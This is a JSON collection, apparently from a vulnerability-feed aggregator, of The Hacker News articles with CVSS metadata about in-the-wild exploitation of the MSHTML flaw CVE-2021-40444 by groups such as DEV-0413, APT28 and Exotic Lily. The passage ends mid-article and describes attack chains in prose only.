"title": "Watch Out! Researchers Spot New Microsoft Office Zero-Day Exploit in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-05-30T15:44:33", "id": "THN:E7762183A6F7B3DDB942D3F1F99748F6", "href": "https://thehackernews.com/2022/05/watch-out-researchers-spot-new.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:18", "description": "[](<https://thehackernews.com/images/-3vEprTVA4BI/YULvTEzYNCI/AAAAAAAADz0/RpSk1fU9GbcY7e98Gg2r8aBRvy73Z52kACLcBGAsYHQ/s0/cyberattack.jpg>)\n\nMicrosoft on Wednesday disclosed details of a targeted phishing campaign that leveraged a now-patched zero-day flaw in its MSHTML platform using specially-crafted Office documents to deploy Cobalt Strike Beacon on compromised Windows systems.\n\n\"These attacks used the vulnerability, tracked as [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40444>), as part of an initial access campaign that distributed custom Cobalt Strike Beacon loaders,\" Microsoft Threat Intelligence Center [said](<https://www.microsoft.com/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability/>) in a technical write-up. \"These loaders communicated with an infrastructure that Microsoft associates with multiple cybercriminal campaigns, including human-operated ransomware.\"\n\nDetails about CVE-2021-40444 (CVSS score: 8.8) first [emerged](<https://thehackernews.com/2021/09/new-0-day-attack-targeting-windows.html>) on September 7 after researchers from EXPMON alerted the Windows maker about a \"highly sophisticated zero-day attack\" aimed at Microsoft Office users by taking advantage of a remote code execution vulnerability in MSHTML (aka Trident), a proprietary browser engine for the now-discontinued Internet Explorer and which is used in Office to render web content inside Word, Excel, and PowerPoint documents.\n\n\"The observed attack vector relies on a malicious ActiveX control that could be loaded by the browser rendering engine using a malicious Office document,\" the researchers noted. Microsoft has since [rolled out a fix](<https://thehackernews.com/2021/09/microsoft-releases-patch-for-actively.html>) for the vulnerability as part of its Patch Tuesday updates a week later on September 14.\n\nThe Redmond-based tech giant attributed the activities to related cybercriminal clusters it tracks as DEV-0413 and DEV-0365, the latter of which is the company's moniker for the emerging threat group associated with creating and managing the Cobalt Strike infrastructure used in the attacks. The earliest exploitation attempt by DEV-0413 dates back to August 18.\n\nThe exploit delivery mechanism originates from emails impersonating contracts and legal agreements hosted on file-sharing sites. Opening the malware-laced document leads to the download of a Cabinet archive file containing a DLL bearing an INF file extension that, when decompressed, leads to the execution of a function within that DLL. The DLL, in turn, retrieves remotely hosted shellcode \u2014 a custom Cobalt Strike Beacon loader \u2014 and loads it into the Microsoft address import tool.\n\nAdditionally, Microsoft said some of the infrastructures that were used by DEV-0413 to host the malicious artifacts were also involved in the delivery of BazaLoader and Trickbot payloads, a separate set of activities the company monitors under the codename DEV-0193 (and by Mandiant as UNC1878).\n\n\"At least one organization that was successfully compromised by DEV-0413 in their August campaign was previously compromised by a wave of similarly-themed malware that interacted with DEV-0365 infrastructure almost two months before the CVE-2021-40444 attack,\" the researchers said. \"It is currently not known whether the retargeting of this organization was intentional, but it reinforces the connection between DEV-0413 and DEV-0365 beyond sharing of infrastructure.\"\n\nIn an independent investigation, Microsoft's RiskIQ subsidiary attributed the attacks with high confidence to a ransomware syndicate known as Wizard Spider aka Ryuk, noting that the network infrastructure employed to provide command-and-control to the Cobalt Strike Beacon implants spanned more than 200 active servers.\n\n\"The association of a zero-day exploit with a ransomware group, however remote, is troubling,\" RiskIQ researchers [said](<https://www.riskiq.com/blog/external-threat-management/wizard-spider-windows-0day-exploit/>). It suggests either that turnkey tools like zero-day exploits have found their way into the already robust ransomware-as-a-service (RaaS) ecosystem or that the more operationally sophisticated groups engaged in traditional, government-backed espionage are using criminally controlled infrastructure to misdirect and impede attribution.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-16T07:19:00", "type": "thn", "title": "Windows MSHTML 0-Day Exploited to Deploy Cobalt Strike Beacon in Targeted Attacks", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-11-12T15:17:20", "id": "THN:59AE75C78D4644BFA6AD90225B3DE0C1", "href": "https://thehackernews.com/2021/09/windows-mshtml-0-day-exploited-to.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:38:04", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEjYUPLUjcZm_IOi_2W8OCO67vRS3dKYHbn9uyV27yUDW18dhUv8jXFX9JDvQYw6FCzwj__3eQkTEwAOG-s6nigko_jBV77WQl46SxYEsGMQxc5g2hIFfR11hGm-vi1oobscaw6jTNgq2ed6ZN5OE9wz9JHWzNk0PH1xq9WzsWMs18Gk_P_yhPWT0YQm>)\n\nA new Iranian threat actor has been discovered exploiting a now-addressed critical flaw in the Microsoft Windows MSHTML platform to target Farsi-speaking victims with a previously undocumented PowerShell-based information stealer designed to harvest extensive details from infected machines.\n\n\"[T]he stealer is a PowerShell script, short with powerful collection capabilities \u2014 in only ~150 lines, it provides the adversary a lot of critical information including screen captures, Telegram files, document collection, and extensive data about the victim's environment,\" SafeBreach Labs researcher Tomer Bar [said](<https://www.safebreach.com/blog/2021/new-powershortshell-stealer-exploits-recent-microsoft-mshtml-vulnerability-to-spy-on-farsi-speakers/>) in a report published Wednesday.\n\nNearly half of the targets are from the U.S., with the cybersecurity firm noting that the attacks are likely aimed at \"Iranians who live abroad and might be seen as a threat to Iran's Islamic regime.\"\n\nThe phishing campaign, which began in July 2021, involved the exploitation of CVE-2021-40444, a remote code execution flaw that could be exploited using specially crafted Microsoft Office documents. The vulnerability was [patched](<https://thehackernews.com/2021/09/microsoft-releases-patch-for-actively.html>) by Microsoft in September 2021, weeks after [reports](<https://thehackernews.com/2021/09/new-0-day-attack-targeting-windows.html>) of active exploitation emerged in the wild.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEgHnByMecpjc8CwGXlYLKRdnKgH6K5l2WpL2UN8Tsn4OgwoQxswAm4WoSD9d7rUtLNPFN59Z11rRxwTC3ZRa4tu-3rpZvcB0cO59nDNhYGmpe6L38Tx8Y-merXNp54673AbqS20eHA5cJ4CBUQ0KjBxCH5it3HfxkZ0_bBtO1JWp3_1j6rxKqM_SMJv>)\n\n\"An attacker could craft a malicious ActiveX control to be used by a Microsoft Office document that hosts the browser rendering engine. The attacker would then have to convince the user to open the malicious document. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights,\" the Windows maker had noted.\n\nThe attack sequence described by SafeBreach begins with the targets receiving a spear-phishing email that comes with a Word document as an attachment. Opening the file triggers the exploit for CVE-2021-40444, resulting in the execution of a PowerShell script dubbed \"PowerShortShell\" that's capable of hoovering sensitive information and transmitting them to a command-and-control (C2) server.\n\nWhile infections involving the deployment of the info-stealer were observed on September 15, a day after Microsoft issued patches for the flaw, the aforementioned C2 server was also employed to harvest victims' Gmail and Instagram credentials as part of two phishing campaigns staged by the same adversary in July 2021. \n\nThe development is the latest in a string of attacks that have capitalized on the MSTHML rendering engine flaw, with Microsoft previously [disclosing](<https://thehackernews.com/2021/09/windows-mshtml-0-day-exploited-to.html>) a targeted phishing campaign that abused the vulnerability as part of an initial access campaign to distribute custom Cobalt Strike Beacon loaders.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-25T11:33:00", "type": "thn", "title": "Hackers Using Microsoft MSHTML Flaw to Spy on Targeted PCs with Malware", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-22T07:07:24", "id": "THN:C4188C7A44467E425407D33067C14094", "href": "https://thehackernews.com/2021/11/hackers-using-microsoft-mshtml-flaw-to.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:47", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEgA-QKrMYatN3F_M4-v7x9HM6nvdPD1OS7NKKkIRgnsnSvlLAXRgr6hsKEZ00atwgnoL5cprjlDTBz9OCZqP7C83Y62uK7Zhq5VsgW8BYehEgXjsimQXbNn7rdTOaC96Glv7wizMuFukmGaa6Uo3KZH5Wejk3G_0r9eLqZqjNOspdt5uUMkJ6gyxsw8>)\n\nA short-lived phishing campaign has been observed taking advantage of a novel exploit that bypassed a patch put in place by Microsoft to fix a remote code execution vulnerability affecting the MSHTML component with the goal of delivering Formbook malware.\n\n\"The attachments represent an escalation of the attacker's abuse of the CVE-2021-40444 bug and demonstrate that even a patch can't always mitigate the actions of a motivated and sufficiently skilled attacker,\" SophosLabs researchers Andrew Brandt and Stephen Ormandy [said](<https://news.sophos.com/en-us/2021/12/21/attackers-test-cab-less-40444-exploit-in-a-dry-run/>) in a new report published Tuesday.\n\n[CVE-2021-40444](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40444>) (CVSS score: 8.8) relates to a remote code execution flaw in MSHTML that could be exploited using specially crafted Microsoft Office documents. Although Microsoft addressed the security weakness as part of its September 2021 [Patch Tuesday updates](<https://thehackernews.com/2021/09/microsoft-releases-patch-for-actively.html>), it has been put to use in [multiple attacks](<https://thehackernews.com/2021/09/new-0-day-attack-targeting-windows.html>) ever since details pertaining to the flaw became public.\n\nThat same month, the technology giant [uncovered](<https://thehackernews.com/2021/09/windows-mshtml-0-day-exploited-to.html>) a targeted phishing campaign that leveraged the vulnerability to deploy Cobalt Strike Beacons on compromised Windows systems. Then in November, SafeBreach Labs [reported](<https://thehackernews.com/2021/11/hackers-using-microsoft-mshtml-flaw-to.html>) details of an Iranian threat actor operation that targeted Farsi-speaking victims with a new PowerShell-based information stealer designed to gather sensitive information.\n\nThe new campaign discovered by Sophos aims to get around the patch's protection by morphing a publicly available [proof-of-concept Office exploit](<https://github.com/Edubr2020/CVE-2021-40444--CABless/blob/main/MS_Windows_CVE-2021-40444%20-%20'Ext2Prot'%20Vulnerability%20'CABless'%20version.pdf>) and weaponizing it to distribute Formbook malware. The cybersecurity firm said the success of the attack can, in part, be attributed to a \"too-narrowly focused patch.\"\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEgASEZ8KvlSBJz1x7Q76isjFrCp75Cd_9NaVZvtMfqRufKRIArSQn1kxLXk86-Tc0o12JfC_n6X-nPIvoEO3JsIgDQ7_PAcEYpeiqvhKofLuQ_e7qZik3FJ-7KTq5CGjh3R7RDATGz4b_HmeYkqXa4dKpvAvSXu-47iGQrPd2IjnRxR4klHyplckGLB>)\n\n\"In the initial versions of CVE-2021-40444 exploits, [the] malicious Office document retrieved a malware payload packaged into a Microsoft Cabinet (or .CAB) file,\" the researchers explained. \"When Microsoft's patch closed that loophole, attackers discovered they could use a different attack chain altogether by enclosing the maldoc in a specially crafted RAR archive.\"\n\n**CAB-less 40444**, as the modified exploit is called, lasted for 36 hours between October 24 and 25, during which spam emails containing a malformed RAR archive file were sent to potential victims. The RAR file, in turn, included a script written in Windows Script Host ([WSH](<https://en.wikipedia.org/wiki/Windows_Script_Host>)) and a Word Document that, upon opening, contacted a remote server hosting malicious JavaScript.\n\nConsequently, the JavaScript code utilized the Word Document as a conduit to launch the WSH script and execute an embedded PowerShell command in the RAR file to retrieve the [Formbook](<https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook>) malware payload from an attacker-controlled website.\n\nAs for why the exploit disappeared a little over a day in use, clues lie in the fact that the modified RAR archive files wouldn't work with older versions of the WinRAR utility. \"So, unexpectedly, in this case, users of the much older, outdated version of WinRAR would have been better protected than users of the latest release,\" the researchers said.\n\n\"This research is a reminder that patching alone cannot protect against all vulnerabilities in all cases,\" SophosLabs Principal Researcher Andrew Brandt said. \"Setting restrictions that prevent a user from accidentally triggering a malicious document helps, but people can still be lured into clicking the 'enable content' button.\"\n\n\"It is therefore vitally important to educate employees and remind them to be suspicious of emailed documents, especially when they arrive in unusual or unfamiliar compressed file formats from people or companies they don't know,\" Brandt added. When reached for a response, a Microsoft spokesperson said \"we are investigating these reports and will take appropriate action as needed to help keep customers protected.\"\n\n**_Update:_** Microsoft told The Hacker News that the aforementioned exploit was indeed addressed with security updates that were released in September 2021. Sophos now notes that the CAB-less 40444 exploit \"may have evaded mitigations of CVE-2021-40444 without the September patch focused on the CAB-style attack\" and that the patch blocks the malicious behavior.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-12-22T07:45:00", "type": "thn", "title": "New Exploit Lets Malware Attackers Bypass Patch for Critical Microsoft MSHTML Flaw", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-29T03:33:40", "id": "THN:8A60310AB796B7372A105B7C8811306B", "href": "https://thehackernews.com/2021/12/new-exploit-lets-malware-attackers.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:39", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEjqkUGrj098m-d_WWiB3rvM91Eu1x3fZweKFwfNSYwVrZToTWUlCh3s3UvHQIXtbPP4vPubJ_dEdC7jSX7gGkeScLCqYsa37Zuw_hFBK6g9FbzvO5nMZPrRUk6fjS1F01cduuDD_mnZ-OKnauen-xJmprSHgWH_jmx8MYUffZvp4uojtUBzm6BbCwIZ>)\n\nCybersecurity researchers on Tuesday took the wraps off a multi-stage espionage campaign targeting high-ranking government officials overseeing national security policy and individuals in the defense industry in Western Asia.\n\nThe attack is unique as it leverages Microsoft OneDrive as a command-and-control (C2) server and is split into as many as six stages to stay as hidden as possible, Trellix \u2014 a new company created following the merger of security firms McAfee Enterprise and FireEye \u2014 said in a [report](<https://www.trellix.com/en-gb/about/newsroom/stories/threat-labs/prime-ministers-office-compromised.html>) shared with The Hacker News.\n\n\"This type of communication allows the malware to go unnoticed in the victims' systems since it will only connect to legitimate Microsoft domains and won't show any suspicious network traffic,\" Trellix explained.\n\nFirst signs of activity associated with the covert operation are said to have commenced as early as June 18, 2021, with two victims reported on September 21 and 29, followed by 17 more in a short span of three days between October 6 and 8.\n\n\"The attack is particularly unique due to the prominence of its victims, the use of a recent [security flaw], and the use of an attack technique that the team had not seen before,\" Christiaan Beek, lead scientist at Trellix, said. \"The objective was clearly espionage.\"\n\nTrellix attributed the sophisticated attacks with moderate confidence to the Russia-based [APT28](<https://malpedia.caad.fkie.fraunhofer.de/actor/sofacy>) group, also tracked under the monikers Sofacy, Strontium, Fancy Bear, and Sednit, based on similarities in the source code as well as in the attack indicators and geopolitical objectives.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEiHATh-_6CXq1DE4gF63tRFptoK4b3k33uBkDfc-JwaJRbLhn0cxU2JHUh5A-0U_AsQ3XgqvcFjPKtR6AVo-_daYwK8-jLWPGzamt2d7MjD1zstHO8IFPqdv3NTZU3GvsI_Wdk9Q7rG6zd84PEcawqbp7bJMrog9xoaUDkiJadygQnO1Wh-qdlH79xN>)\n\n\"We are supremely confident that we are dealing with a very skilled actor based on how infrastructure, malware coding and operation were set up,\" Trellix security researcher Marc Elias said.\n\nThe infection chain begins with the execution of a Microsoft Excel file containing an exploit for the MSHTML remote code execution vulnerability ([CVE-2021-40444](<https://thehackernews.com/2021/09/microsoft-releases-patch-for-actively.html>)), which is used to run a malicious binary that acts as the downloader for a third-stage malware dubbed Graphite.\n\nThe DLL executable uses OneDrive as the C2 server via the Microsoft Graph API to retrieve additional stager malware that ultimately downloads and executes [Empire](<https://attack.mitre.org/software/S0363/>), an open-source PowerShell-based post-exploitation framework widely abused by threat actors for follow-on activities.\n\n\"Using the Microsoft OneDrive as a command-and-control Server mechanism was a surprise, a novel way of quickly interacting with the infected machines by dragging the encrypted commands into the victim's folders,\" Beek explained. \"Next OneDrive would sync with the victim\u2019s machines and encrypted commands being executed, whereafter the requested info was encrypted and sent back to the OneDrive of the attacker.\"\n\nIf anything, the development marks the continued exploitation of the MSTHML rendering engine flaw, with [Microsoft](<https://thehackernews.com/2021/09/windows-mshtml-0-day-exploited-to.html>) and [SafeBreach Labs](<https://thehackernews.com/2021/11/hackers-using-microsoft-mshtml-flaw-to.html>) disclosing multiple campaigns that have weaponized the vulnerability to plant malware and distribute custom Cobalt Strike Beacon loaders.\n\n\"The main takeaway is to highlight the level of access threat campaigns, and in particular how capable threat actors are able to permeate the most senior levels of government,\" Raj Samani, chief scientist and fellow at Trellix told The Hacker News. \"It is of paramount importance that security practitioners tasked with protecting such high value systems consider additional security measures to prevent, detect and remediate against such hostile actions.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-01-25T14:04:00", "type": "thn", "title": "Hackers Exploited MSHTML Flaw to Spy on Government and Defense Targets", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-01-29T08:06:51", "id": "THN:BD014635C5F702379060A20290985162", "href": "https://thehackernews.com/2022/01/hackers-exploited-mshtml-flaw-to-spy-on.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-10-02T06:04:33", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgRdLCnYaPXc_hVvRWhZ1nKYDtBRo6rwk1xGSO3wDrqcJ04igkpjKQyuyHKgmgeHL6GS7XLJjB6WCffBWb-ntXiCGFrcggxS3t1sQxo2LiuX7WI9F-gwW3tPRARSzEWceyzsLgu1VSyZndaF36ZhDlzpBRvkHLp7Ao_zaUYJmthkY4IZN4znwcyRdpY/s728-e100/hacking.jpg>)\n\nThe Russian state-sponsored threat actor known as [APT28](<https://thehackernews.com/2022/09/researchers-identify-3-hacktivist.html>) has been found leveraging a new code execution method that makes use of mouse movement in decoy Microsoft PowerPoint documents to deploy malware.\n\nThe technique \"is designed to be triggered when the user starts the presentation mode and moves the mouse,\" cybersecurity firm Cluster25 [said](<https://blog.cluster25.duskrise.com/2022/09/23/in-the-footsteps-of-the-fancy-bear-powerpoint-graphite/>) in a technical report. \"The code execution runs a PowerShell script that downloads and executes a dropper from OneDrive.\"\n\nThe dropper, a seemingly harmless image file, functions as a pathway for a follow-on payload, a variant of a malware known as Graphite, which uses the Microsoft Graph API and OneDrive for command-and-control (C2) communications to retrieve additional payloads.\n\nThe attack employs a lure document that makes use of a template potentially linked to the Organisation for Economic Co-operation and Development ([OECD](<https://en.wikipedia.org/wiki/OECD>)), a Paris-based intergovernmental entity.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjM4urmpBb2OaNLBBurEzXMWD5Gc0bF0d-1A8k55IscX0Hlkq-v1VQ39Xj9y7iwnPFlRBxvY1w6ZlUWb5dYTHpIwA3gVd7mcXXY64dImoNQO7bXe84Wez6JCWTlrdS77BnSIF6DllbmNoGykj67hPrGivBZDqdvzOgXckRo6adoi5bgIMpmnmWEI4_Y/s728-e100/ppt.jpg>)\n\nCluster25 noted the attacks may be ongoing, considering that the URLs used in the attacks appeared active in August and September, although the hackers had previously laid the groundwork for the campaign between January and February.\n\nPotential targets of the operation likely include entities and individuals operating in the defense and government sectors of Europe and Eastern Europe, the company added, citing an analysis of geopolitical objectives and the gathered artifacts.\n\nThis is not the first time the adversarial collective has deployed Graphite. In January 2022, Trellix [disclosed](<https://thehackernews.com/2022/01/hackers-exploited-mshtml-flaw-to-spy-on.html>) a similar attack chain that exploited the MSHTML remote code execution vulnerability ([CVE-2021-40444](<https://thehackernews.com/2021/09/microsoft-releases-patch-for-actively.html>)) to drop the backdoor.\n\nThe development is a sign that APT28 (aka Fancy Bear) continues to hone its technical tradecraft and evolve its methods for maximum impact as exploitation routes once deemed viable (e.g., macros) cease to be profitable.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-09-28T10:09:00", "type": "thn", "title": "Hackers Using PowerPoint Mouseover Trick to Infect Systems with Malware", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-10-02T05:18:39", "id": "THN:B399D1943153CEEF405B85D4310C2142", "href": "https://thehackernews.com/2022/09/hackers-using-powerpoint-mouseover.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-21T15:55:37", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEhTDhGSCLFNoe2MDkuwd-dbu3bKqPHtCuuSNeeosLJmQdiXnE3Hq_M2wsCJ9OqEk2ig0Jn0ITJ4RW9LkqUzEeWCBF6R1H6SS_wGXq_pLI3Y38VenthyRa2AlQQkCDlvzat6a-UDOxxvG3p-0r9ppLP1GKrMXdqPUW28Q6TZDz8v57TTuwc6KS6gi8pJ>)\n\nGoogle's Threat Analysis Group (TAG) took the wraps off a new [initial access broker](<https://thehackernews.com/2021/11/blackberry-uncover-initial-access.html>) that it said is closely affiliated to a Russian cyber crime gang notorious for its Conti and Diavol ransomware operations.\n\nDubbed Exotic Lily, the financially motivated threat actor has been observed exploiting a now-patched critical flaw in the Microsoft Windows MSHTML platform ([CVE-2021-40444](<https://thehackernews.com/2021/09/microsoft-releases-patch-for-actively.html>)) as part of widespread phishing campaigns that involved sending no fewer than 5,000 business proposal-themed emails a day to 650 targeted organizations globally.\n\n\"Initial access brokers are the opportunistic locksmiths of the security world, and it's a full-time job,\" TAG researchers Vlad Stolyarov and Benoit Sevens [said](<https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/>). \"These groups specialize in breaching a target in order to open the doors \u2014 or the Windows \u2014 to the malicious actor with the highest bid.\"\n\nExotic Lily, first spotted in September 2021, is said to have been involved in data exfiltration and deployment of the human-operated Conti and [Diavol](<https://thehackernews.com/2021/08/researchers-find-new-evidence-linking.html>) ransomware strains, both of which share overlaps with Wizard Spider, the Russian cyber criminal syndicate that's also known for operating [TrickBot](<https://thehackernews.com/2022/03/trickbot-malware-abusing-hacked-iot.html>), [BazarBackdoor](<https://thehackernews.com/2021/07/phony-call-centers-tricking-users-into.html>), and [Anchor](<https://thehackernews.com/2022/03/trickbot-malware-gang-upgrades-its.html>).\n\n\"Yes, this is a possibility, especially considering this is more sophisticated and targeted than a traditional spam campaign, but we don't know for sure as of now,\" Google TAG told The Hacker News when asked whether Exotic Lily could be another extension of the Wizard Spider group.\n\n\"In the [Conti leaks](<https://thehackernews.com/2022/03/conti-ransomware-gangs-internal-chats.html>), Conti members mention 'spammers' as someone who they work with (e.g., provide custom-built 'crypted' malware samples, etc.) through outsourcing. However, most of the 'spammers' don't seem to be present (or actively communicate) in the chat, hence leading to a conclusion they're operating as a separate entity.\"\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEiRLlObJVyztso8c0_EbePqlTPrjHuRu1-NWCjxiV47unTWyXRykIMkEo4lnhKEbWUZSP4zUPmn3jo-N6O4gz5CgskYHypFzEWSI4djVkBE6Gle_kwlb7Mp7tQN5cmk2BPWhrXILnSvxl38u2qgqfAntvF85WiXMyt0WIn_ikXRHLwk6apNoOd64qob>)\n\nThe threat actor's social engineering lures, sent from spoofed email accounts, have specifically singled out IT, cybersecurity, and healthcare sectors, although post November 2021, the attacks have grown to be more indiscriminate, targeting a wide variety of organizations and industries.\n\nBesides using fictitious companies and identities as a means to build trust with the targeted entities, Exotic Lily has leveraged legitimate file-sharing services like WeTransfer, TransferNow and OneDrive to deliver [BazarBackdoor 